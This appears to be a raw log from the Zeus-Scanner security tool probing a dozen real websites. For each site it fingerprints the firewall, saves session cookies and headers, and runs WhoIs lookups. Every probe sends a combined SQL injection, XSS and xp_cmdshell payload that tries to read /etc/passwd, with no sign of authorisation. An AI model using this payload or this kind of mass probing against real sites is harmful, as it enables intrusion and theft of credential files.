2017-11-13 13:07:07,672;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/cookies/embracingtheinfinite.com-cookie.log'...
2017-11-13 13:07:07,673;zeus-log;DEBUG;fetched {'Content-Encoding': 'gzip', 'Transfer-Encoding': 'chunked', 'Set-Cookie': 'e9556429e819f8bd6a481ee6a5a9f958=92c4010e74613d634c82c0aa2404609d; path=/', 'Age': '0', 'Server': 'ATS/5.3.0', 'Connection': 'keep-alive', 'X-Content-Encoded-By': 'Joomla! 2.5', 'Pragma': 'no-cache', 'Cache-Control': 'no-cache', 'Date': 'Mon, 13 Nov 2017 19:07:07 GMT', 'P3P': 'policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV", CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"', 'Content-Type': 'text/html; charset=utf-8'}...
2017-11-13 13:07:07,674;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/embracingtheinfinite.com-headers.json'...
2017-11-13 13:07:07,674;zeus-log;INFO;performing WhoIs lookup on given domain 'embracingtheinfinite.com'...
2017-11-13 13:07:08,229;zeus-log;INFO;discovered raw information...
2017-11-13 13:07:08,229;zeus-log;INFO;gathering interesting information...
2017-11-13 13:07:08,232;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/embracingtheinfinite.com-whois.json'...
2017-11-13 13:07:08,232;zeus-log;INFO;checking URL headers...
2017-11-13 13:07:08,232;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:07:08,233;zeus-log;DEBUG;attempting connection to 'http://www.onegeovo.com/index.php?option=com_content&view=article&id=176&Itemid=47 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:07:08,793;zeus-log;INFO;no WAF/IDS/IPS has been identified on target URL...
2017-11-13 13:07:08,794;zeus-log;DEBUG;loading XML data...
2017-11-13 13:07:08,794;zeus-log;INFO;attempting to get request headers for 'http://www.onegeovo.com/index.php?option=com_content&view=article&id=176&Itemid=47'...
2017-11-13 13:07:09,058;zeus-log;INFO;found a request cookie, saving to file...
2017-11-13 13:07:09,059;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/cookies/www.onegeovo.com-cookie.log'...
2017-11-13 13:07:09,059;zeus-log;DEBUG;fetched {'Transfer-Encoding': 'chunked', 'Set-Cookie': '8812d0a17f37c273631d5675f28938bc=a5c75baf29e9b9bc7532abd527dbe3eb; path=/', 'Expires': 'Mon, 1 Jan 2001 00:00:00 GMT', 'Server': 'Apache', 'Last-Modified': 'Mon, 13 Nov 2017 19:07:08 GMT', 'Connection': 'close', 'Pragma': 'no-cache', 'Cache-Control': 'post-check=0, pre-check=0', 'Date': 'Mon, 13 Nov 2017 19:07:08 GMT', 'P3P': 'CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"', 'Content-Type': 'text/html; charset=utf-8'}...
2017-11-13 13:07:09,060;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/www.onegeovo.com-headers.json'...
2017-11-13 13:07:09,061;zeus-log;INFO;performing WhoIs lookup on given domain 'www.onegeovo.com'...
2017-11-13 13:07:09,724;zeus-log;INFO;discovered raw information...
2017-11-13 13:07:09,725;zeus-log;INFO;gathering interesting information...
2017-11-13 13:07:09,727;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/www.onegeovo.com-whois.json'...
2017-11-13 13:07:09,727;zeus-log;INFO;checking URL headers...
2017-11-13 13:07:09,727;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:07:09,728;zeus-log;DEBUG;attempting connection to 'https://forum.callofwar.com/index.php?custom-page/&id=10 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:07:10,478;zeus-log;WARNING;identified WAF/IDS/IPS is unknown to Zeus, if you know the firewall and the context of the firewall, please create an issue (https://github.com/ekultek/zeus-scanner/issues), fingerprint of the firewall will be written to a log file...
2017-11-13 13:07:10,478;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/unknown-firewall/forum.callofwar.com-fingerprint.html'...
2017-11-13 13:07:10,478;zeus-log;WARNING;the target URL WAF/IDS/IPS has been identified as 'Generic (Unknown)'...
2017-11-13 13:07:10,479;zeus-log;DEBUG;loading XML data...
2017-11-13 13:07:10,479;zeus-log;INFO;attempting to get request headers for 'https://forum.callofwar.com/index.php?custom-page/&id=10'...
2017-11-13 13:07:11,424;zeus-log;INFO;found a request cookie, saving to file...
2017-11-13 13:07:11,426;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/cookies/forum.callofwar.com-cookie.log'...
2017-11-13 13:07:11,426;zeus-log;DEBUG;fetched {'Content-Encoding': 'gzip', 'Set-Cookie': 'wcf21_cookieHash=12b7aa8e444a92ccd1d4f0bb90d238939b458b11; path=/; domain=forum.callofwar.com; secure; HttpOnly', 'Server': 'Apache', 'Connection': 'close', 'X-UA-Compatible': 'IE=edge', 'Date': 'Mon, 13 Nov 2017 19:07:11 GMT', 'X-Frame-Options': 'SAMEORIGIN', 'Content-Type': 'text/html; charset=UTF-8'}...
2017-11-13 13:07:11,427;zeus-log;WARNING;provided target has protection against clickjacking vulnerabilities...
2017-11-13 13:07:11,427;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/forum.callofwar.com-headers.json'...
2017-11-13 13:07:11,428;zeus-log;INFO;performing WhoIs lookup on given domain 'forum.callofwar.com'...
2017-11-13 13:07:11,790;zeus-log;INFO;discovered raw information...
2017-11-13 13:07:11,790;zeus-log;INFO;gathering interesting information...
2017-11-13 13:07:11,792;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/forum.callofwar.com-whois.json'...
2017-11-13 13:07:11,792;zeus-log;INFO;checking URL headers...
2017-11-13 13:07:11,792;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:07:11,792;zeus-log;DEBUG;attempting connection to 'https://wiki.archlinux.org/index.php/xorg AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:07:12,619;zeus-log;WARNING;detection request timed out, assuming no protection and continuing...
2017-11-13 13:07:12,620;zeus-log;INFO;no WAF/IDS/IPS has been identified on target URL...
2017-11-13 13:07:12,620;zeus-log;DEBUG;loading XML data...
2017-11-13 13:07:12,620;zeus-log;INFO;attempting to get request headers for 'https://wiki.archlinux.org/index.php/xorg'...
2017-11-13 13:07:13,263;zeus-log;DEBUG;fetched {'Content-language': 'en', 'X-Content-Type-Options': 'nosniff', 'Transfer-Encoding': 'chunked', 'Expires': 'Thu, 01 Jan 1970 00:00:00 GMT', 'Vary': 'Accept-Encoding, Cookie', 'Server': 'nginx/1.12.2', 'Connection': 'keep-alive', 'Link': '</resources/assets/wiki.png?de8c8>;rel=preload;as=image', 'X-UA-Compatible': 'IE=Edge', 'Pragma': 'no-cache', 'Cache-Control': 'no-cache, no-store, max-age=0, must-revalidate', 'Date': 'Mon, 13 Nov 2017 19:07:13 GMT', 'X-Frame-Options': 'DENY', 'Content-Type': 'text/html; charset=UTF-8'}...
2017-11-13 13:07:13,264;zeus-log;WARNING;provided target has protection against MIME type attacks...
2017-11-13 13:07:13,264;zeus-log;WARNING;provided target has protection against clickjacking vulnerabilities...
2017-11-13 13:07:13,265;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/wiki.archlinux.org-headers.json'...
2017-11-13 13:07:13,265;zeus-log;INFO;performing WhoIs lookup on given domain 'wiki.archlinux.org'...
2017-11-13 13:07:13,711;zeus-log;INFO;discovered raw information...
2017-11-13 13:07:13,712;zeus-log;INFO;gathering interesting information...
2017-11-13 13:07:13,714;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/wiki.archlinux.org-whois.json'...
2017-11-13 13:07:13,714;zeus-log;INFO;checking URL headers...
2017-11-13 13:07:13,714;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:07:13,714;zeus-log;DEBUG;attempting connection to 'https://www.kapook.com/webout.php?url=http://journals.plos.org/plosone/article?id=10.1371/journal.pone.0111489 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:07:15,363;zeus-log;INFO;no WAF/IDS/IPS has been identified on target URL...
2017-11-13 13:07:15,364;zeus-log;DEBUG;loading XML data...
2017-11-13 13:07:15,365;zeus-log;INFO;attempting to get request headers for 'https://www.kapook.com/webout.php?url=http://journals.plos.org/plosone/article?id=10.1371/journal.pone.0111489'...
2017-11-13 13:07:16,528;zeus-log;DEBUG;fetched {'Content-Encoding': 'gzip', 'Transfer-Encoding': 'chunked', 'KP-Cache-Status': 'MISS', 'Expires': 'Mon, 13 Nov 2017 19:12:16 GMT', 'Vary': 'Accept-Encoding', 'Server': 'openresty/1.11.2.2', 'Connection': 'keep-alive', 'Cache-Control': 'max-age=300, private, must-revalidate', 'Date': 'Mon, 13 Nov 2017 19:07:16 GMT', 'Content-Type': 'text/html'}...
2017-11-13 13:07:16,530;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/www.kapook.com-headers.json'...
2017-11-13 13:07:16,530;zeus-log;INFO;performing WhoIs lookup on given domain 'www.kapook.com'...
2017-11-13 13:07:17,831;zeus-log;INFO;discovered raw information...
2017-11-13 13:07:17,832;zeus-log;INFO;gathering interesting information...
2017-11-13 13:07:17,833;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/www.kapook.com-whois.json'...
2017-11-13 13:07:17,833;zeus-log;INFO;checking URL headers...
2017-11-13 13:07:17,834;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:07:17,834;zeus-log;DEBUG;attempting connection to 'https://learn.nctsn.org/course/index.php?categoryid=10 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:07:18,770;zeus-log;INFO;no WAF/IDS/IPS has been identified on target URL...
2017-11-13 13:07:18,771;zeus-log;DEBUG;loading XML data...
2017-11-13 13:07:18,771;zeus-log;INFO;attempting to get request headers for 'https://learn.nctsn.org/course/index.php?categoryid=10'...
2017-11-13 13:07:19,527;zeus-log;INFO;found a request cookie, saving to file...
2017-11-13 13:07:19,529;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/cookies/learn.nctsn.org-cookie.log'...
2017-11-13 13:07:19,529;zeus-log;DEBUG;fetched {'Content-Script-Type': 'text/javascript', 'Content-Language': 'en-us', 'X-Powered-By': 'PHP/5.5.38', 'Transfer-Encoding': 'chunked', 'Set-Cookie': 'MoodleSession=1jkm96b08lcogjlc5u6kjcpfq2; path=/', 'Accept-Ranges': 'none', 'Expires': '', 'Server': 'Apache', 'Connection': 'close', 'X-UA-Compatible': 'IE=edge', 'Pragma': 'no-cache', 'Cache-Control': 'private, pre-check=0, post-check=0, max-age=0, no-transform', 'Date': 'Mon, 13 Nov 2017 19:07:19 GMT', 'Content-Style-Type': 'text/css', 'Content-Type': 'text/html; charset=utf-8', 'X-Frame-Options': 'sameorigin'}...
2017-11-13 13:07:19,529;zeus-log;WARNING;provided target has protection against clickjacking vulnerabilities...
2017-11-13 13:07:19,530;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/learn.nctsn.org-headers.json'...
2017-11-13 13:07:19,531;zeus-log;INFO;performing WhoIs lookup on given domain 'learn.nctsn.org'...
2017-11-13 13:07:19,977;zeus-log;INFO;discovered raw information...
2017-11-13 13:07:19,977;zeus-log;INFO;gathering interesting information...
2017-11-13 13:07:19,979;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/learn.nctsn.org-whois.json'...
2017-11-13 13:07:19,979;zeus-log;INFO;checking URL headers...
2017-11-13 13:07:19,979;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:07:19,980;zeus-log;DEBUG;attempting connection to 'http://www.iperbarica.com/index.php?view=weblink&catid=2%3Asiti-utili&id=10%3Aundersea-and-hyperbaric-medical-society&option=com_weblinks&Itemid=54 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:07:22,967;zeus-log;INFO;no WAF/IDS/IPS has been identified on target URL...
2017-11-13 13:07:22,972;zeus-log;DEBUG;loading XML data...
2017-11-13 13:07:22,973;zeus-log;INFO;attempting to get request headers for 'http://www.iperbarica.com/index.php?view=weblink&catid=2%3Asiti-utili&id=10%3Aundersea-and-hyperbaric-medical-society&option=com_weblinks&Itemid=54'...
2017-11-13 13:07:24,995;zeus-log;DEBUG;fetched {'Content-Length': '61680', 'Expires': 'Wed, 17 Aug 2005 00:00:00 GMT', 'Keep-Alive': 'timeout=5, max=100', 'Server': 'Apache', 'Last-Modified': 'Mon, 13 Nov 2017 19:07:25 GMT', 'Connection': 'Keep-Alive', 'Pragma': 'no-cache', 'Cache-Control': 'no-store, no-cache, must-revalidate, post-check=0, pre-check=0', 'Date': 'Mon, 13 Nov 2017 19:07:24 GMT', 'P3P': 'CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"', 'Content-Type': 'text/html; charset=utf-8', 'X-Frame-Options': 'SAMEORIGIN'}...
2017-11-13 13:07:24,996;zeus-log;WARNING;provided target has protection against clickjacking vulnerabilities...
2017-11-13 13:07:24,996;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/www.iperbarica.com-headers.json'...
2017-11-13 13:07:24,997;zeus-log;INFO;performing WhoIs lookup on given domain 'www.iperbarica.com'...
2017-11-13 13:07:26,441;zeus-log;INFO;discovered raw information...
2017-11-13 13:07:26,442;zeus-log;INFO;gathering interesting information...
2017-11-13 13:07:26,443;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/www.iperbarica.com-whois.json'...
2017-11-13 13:07:26,443;zeus-log;INFO;checking URL headers...
2017-11-13 13:07:26,444;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:07:26,444;zeus-log;DEBUG;attempting connection to 'http://www.hrecos.org/index.php?view=weblink&catid=19%3Aother-resources&id=10%3Awalkway&option=com_weblinks&Itemid=92 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:07:26,804;zeus-log;WARNING;the target URL WAF/IDS/IPS has been identified as 'ModSecurity: Open Source Web Application Firewall (Trustwave)'...
2017-11-13 13:07:26,805;zeus-log;DEBUG;loading XML data...
2017-11-13 13:07:26,806;zeus-log;INFO;attempting to get request headers for 'http://www.hrecos.org/index.php?view=weblink&catid=19%3Aother-resources&id=10%3Awalkway&option=com_weblinks&Itemid=92'...
2017-11-13 13:07:28,168;zeus-log;DEBUG;fetched {'Content-Length': '22001', 'X-XSS-Protection': '1; mode=block', 'X-Content-Type-Options': 'nosniff', 'Content-Encoding': 'gzip', 'X-Sucuri-Cache': 'MISS', 'Accept-Ranges': 'bytes', 'Vary': 'Accept-Encoding', 'Server': 'nginx', 'Last-Modified': 'Mon, 13 Nov 2017 18:02:50 GMT', 'Connection': 'keep-alive', 'ETag': '"55f1-55de1142ae597"', 'Date': 'Mon, 13 Nov 2017 19:07:28 GMT', 'X-Frame-Options': 'SAMEORIGIN', 'X-Sucuri-ID': '12008', 'Content-Type': 'text/html; charset=UTF-8'}...
2017-11-13 13:07:28,170;zeus-log;WARNING;provided target has protection against MIME type attacks...
2017-11-13 13:07:28,171;zeus-log;WARNING;provided target has protection against clickjacking vulnerabilities...
2017-11-13 13:07:28,171;zeus-log;WARNING;provided target has protection against XSS attacks...
2017-11-13 13:07:28,172;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/www.hrecos.org-headers.json'...
2017-11-13 13:07:28,172;zeus-log;INFO;performing WhoIs lookup on given domain 'www.hrecos.org'...
2017-11-13 13:07:28,568;zeus-log;INFO;discovered raw information...
2017-11-13 13:07:28,569;zeus-log;INFO;gathering interesting information...
2017-11-13 13:07:28,570;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/www.hrecos.org-whois.json'...
2017-11-13 13:07:28,570;zeus-log;INFO;checking URL headers...
2017-11-13 13:07:28,571;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:07:28,571;zeus-log;DEBUG;attempting connection to 'http://vosp.info/index.php/TYPO3.CMS_7.6_Schnipsel AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:07:29,605;zeus-log;WARNING;detection request timed out, assuming no protection and continuing...
2017-11-13 13:07:29,606;zeus-log;INFO;no WAF/IDS/IPS has been identified on target URL...
2017-11-13 13:07:29,606;zeus-log;DEBUG;loading XML data...
2017-11-13 13:07:29,607;zeus-log;INFO;attempting to get request headers for 'http://vosp.info/index.php/TYPO3.CMS_7.6_Schnipsel'...
2017-11-13 13:07:30,178;zeus-log;DEBUG;fetched {'X-Content-Type-Options': 'nosniff', 'Content-language': 'de', 'Transfer-Encoding': 'chunked', 'Expires': 'Thu, 01 Jan 1970 00:00:00 GMT', 'Vary': 'Accept-Encoding,Cookie', 'Server': 'Apache/2.4.10 (Debian)', 'Connection': 'close', 'X-UA-Compatible': 'IE=Edge', 'Pragma': 'no-cache', 'Cache-Control': 'no-cache, no-store, max-age=0, must-revalidate', 'Date': 'Mon, 13 Nov 2017 19:07:29 GMT', 'X-Frame-Options': 'DENY', 'Content-Type': 'text/html; charset=UTF-8'}...
2017-11-13 13:07:30,179;zeus-log;WARNING;provided target has protection against MIME type attacks...
2017-11-13 13:07:30,179;zeus-log;WARNING;provided target has protection against clickjacking vulnerabilities...
2017-11-13 13:07:30,180;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/vosp.info-headers.json'...
2017-11-13 13:07:30,181;zeus-log;INFO;performing WhoIs lookup on given domain 'vosp.info'...
2017-11-13 13:07:30,618;zeus-log;INFO;discovered raw information...
2017-11-13 13:07:30,619;zeus-log;INFO;gathering interesting information...
2017-11-13 13:07:30,621;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/vosp.info-whois.json'...
2017-11-13 13:07:30,621;zeus-log;INFO;checking URL headers...
2017-11-13 13:07:30,621;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:07:30,622;zeus-log;DEBUG;attempting connection to 'http://www.happycgi.com/program/demo_link.php?mode=homepage&number=15783 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:07:31,874;zeus-log;WARNING;identified WAF/IDS/IPS is unknown to Zeus, if you know the firewall and the context of the firewall, please create an issue (https://github.com/ekultek/zeus-scanner/issues), fingerprint of the firewall will be written to a log file...
2017-11-13 13:07:31,875;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/unknown-firewall/www.happycgi.com-fingerprint.html'...
2017-11-13 13:07:31,876;zeus-log;WARNING;the target URL WAF/IDS/IPS has been identified as 'Generic (Unknown)'...
2017-11-13 13:07:31,876;zeus-log;DEBUG;loading XML data...
2017-11-13 13:07:31,877;zeus-log;INFO;attempting to get request headers for 'http://www.happycgi.com/program/demo_link.php?mode=homepage&number=15783'...
2017-11-13 13:07:32,370;zeus-log;INFO;found a request cookie, saving to file...
2017-11-13 13:07:32,371;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/cookies/www.happycgi.com-cookie.log'...
2017-11-13 13:07:32,372;zeus-log;DEBUG;fetched {'Content-Length': '70', 'X-Powered-By': 'PHP/5.2.17', 'Set-Cookie': 'PHPSESSID=44515b4e96aad336994c71c177856d0f; path=/; domain=.happycgi.com', 'Expires': 'Thu, 19 Nov 1981 08:52:00 GMT', 'Keep-Alive': 'timeout=8, max=100', 'Server': 'Microsoft-IIS/7.0', 'Connection': 'Keep-Alive', 'X-UA-Compatible': 'IE=EmulateIE8', 'Pragma': 'no-cache', 'Cache-Control': 'no-store, no-cache, must-revalidate, post-check=0, pre-check=0', 'Date': 'Mon, 13 Nov 2017 19:07:31 GMT', 'Content-Type': 'text/html; charset=euc-kr'}...
2017-11-13 13:07:32,373;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/www.happycgi.com-headers.json'...
2017-11-13 13:07:32,373;zeus-log;INFO;performing WhoIs lookup on given domain 'www.happycgi.com'...
2017-11-13 13:07:33,994;zeus-log;INFO;discovered raw information...
2017-11-13 13:07:33,995;zeus-log;INFO;gathering interesting information...
2017-11-13 13:07:33,998;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/www.happycgi.com-whois.json'...
2017-11-13 13:07:33,999;zeus-log;INFO;checking URL headers...
2017-11-13 13:07:33,999;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:07:33,999;zeus-log;DEBUG;attempting connection to 'https://www.landmarkdoulas.com/index.php?option=com_content&view=article&id=10&catid=2 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:07:34,807;zeus-log;WARNING;detection request timed out, assuming no protection and continuing...
2017-11-13 13:07:34,808;zeus-log;INFO;no WAF/IDS/IPS has been identified on target URL...
2017-11-13 13:07:34,808;zeus-log;DEBUG;loading XML data...
2017-11-13 13:07:34,808;zeus-log;INFO;attempting to get request headers for 'https://www.landmarkdoulas.com/index.php?option=com_content&view=article&id=10&catid=2'...
2017-11-13 13:07:35,343;zeus-log;INFO;found a request cookie, saving to file...
2017-11-13 13:07:35,345;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/cookies/www.landmarkdoulas.com-cookie.log'...
2017-11-13 13:07:35,345;zeus-log;DEBUG;fetched {'X-Cache-Enabled': 'True', 'Content-Encoding': 'gzip', 'Transfer-Encoding': 'chunked', 'Set-Cookie': '47e2d50a26c0abdf2f8bfe3dacc9d2bc=ivufnndp6isuf78of2er73mub7; path=/; secure; HttpOnly', 'Expires': 'Wed, 17 Aug 2005 00:00:00 GMT', 'Keep-Alive': 'timeout=5, max=100', 'Server': 'Apache', 'Last-Modified': 'Mon, 13 Nov 2017 19:07:35 GMT', 'Connection': 'Keep-Alive', 'Pragma': 'no-cache', 'Cache-Control': 'no-store, no-cache, must-revalidate, post-check=0, pre-check=0', 'Date': 'Mon, 13 Nov 2017 19:07:35 GMT', 'Content-Type': 'text/html; charset=utf-8'}...
2017-11-13 13:07:35,346;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/www.landmarkdoulas.com-headers.json'...
2017-11-13 13:07:35,347;zeus-log;INFO;performing WhoIs lookup on given domain 'www.landmarkdoulas.com'...
2017-11-13 13:07:35,940;zeus-log;INFO;discovered raw information...
2017-11-13 13:07:35,940;zeus-log;INFO;gathering interesting information...
2017-11-13 13:07:35,942;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/www.landmarkdoulas.com-whois.json'...
2017-11-13 13:07:35,943;zeus-log;INFO;checking URL headers...
2017-11-13 13:07:35,943;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:07:35,943;zeus-log;DEBUG;attempting connection to 'http://www.mendipramblers.co.uk/index.php?option=com_contact&view=category&id=10&Itemid=111 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:07:36,529;zeus-log;WARNING;identified WAF/IDS/IPS is unknown to Zeus, if you know the firewall and the context of the firewall, please create an issue (https://github.com/ekultek/zeus-scanner/issues), fingerprint of the firewall will be written to a log file...
2017-11-13 13:07:36,530;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/unknown-firewall/www.mendipramblers.co.uk-fingerprint.html'...
2017-11-13 13:07:36,531;zeus-log;WARNING;the target URL WAF/IDS/IPS has been identified as 'Generic (Unknown)'...
2017-11-13 13:07:36,531;zeus-log;DEBUG;loading XML data...
2017-11-13 13:07:36,532;zeus-log;INFO;attempting to get request headers for 'http://www.mendipramblers.co.uk/index.php?option=com_contact&view=category&id=10&Itemid=111'...
2017-11-13 13:07:38,953;zeus-log;INFO;found a request cookie, saving to file...
2017-11-13 13:07:38,954;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/cookies/www.mendipramblers.co.uk-cookie.log'...
2017-11-13 13:07:38,954;zeus-log;DEBUG;fetched {'X-Powered-By': 'PHP/7.0.25', 'Transfer-Encoding': 'chunked', 'Set-Cookie': '515ffd4f463116eaffb6d980010fbf82=pgmo87es2runa30thvie5f8665; path=/; HttpOnly', 'Expires': 'Wed, 17 Aug 2005 00:00:00 GMT', 'Server': 'Apache/2.4.29 (Unix)', 'Last-Modified': 'Mon, 13 Nov 2017 19:07:38 GMT', 'Pragma': 'no-cache', 'Cache-Control': 'no-store, no-cache, must-revalidate, post-check=0, pre-check=0', 'Date': 'Mon, 13 Nov 2017 19:07:36 GMT', 'P3P': 'CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"', 'Content-Type': 'text/html; charset=utf-8'}...
2017-11-13 13:07:38,955;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/www.mendipramblers.co.uk-headers.json'...
2017-11-13 13:07:38,955;zeus-log;INFO;performing WhoIs lookup on given domain 'www.mendipramblers.co.uk'...
2017-11-13 13:07:39,496;zeus-log;INFO;discovered raw information...
2017-11-13 13:07:39,497;zeus-log;INFO;gathering interesting information...
2017-11-13 13:07:39,499;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/www.mendipramblers.co.uk-whois.json'...
2017-11-13 13:07:39,499;zeus-log;INFO;checking URL headers...
2017-11-13 13:07:39,499;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:07:39,500;zeus-log;DEBUG;attempting connection to 'http://www.rotwand.com/index.php?option=com_content&view=article&id=10&Itemid=15&lang=en AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:07:40,047;zeus-log;WARNING;identified WAF/IDS/IPS is unknown to Zeus, if you know the firewall and the context of the firewall, please create an issue (https://github.com/ekultek/zeus-scanner/issues), fingerprint of the firewall will be written to a log file...
2017-11-13 13:07:40,048;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/unknown-firewall/www.rotwand.com-fingerprint.html'...
2017-11-13 13:07:40,048;zeus-log;WARNING;the target URL WAF/IDS/IPS has been identified as 'Generic (Unknown)'...
2017-11-13 13:07:40,048;zeus-log;DEBUG;loading XML data...
2017-11-13 13:07:40,049;zeus-log;INFO;attempting to get request headers for 'http://www.rotwand.com/index.php?option=com_content&view=article&id=10&Itemid=15&lang=en'...
2017-11-13 13:07:40,884;zeus-log;INFO;found a request cookie, saving to file...
2017-11-13 13:07:40,885;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/cookies/www.rotwand.com-cookie.log'...
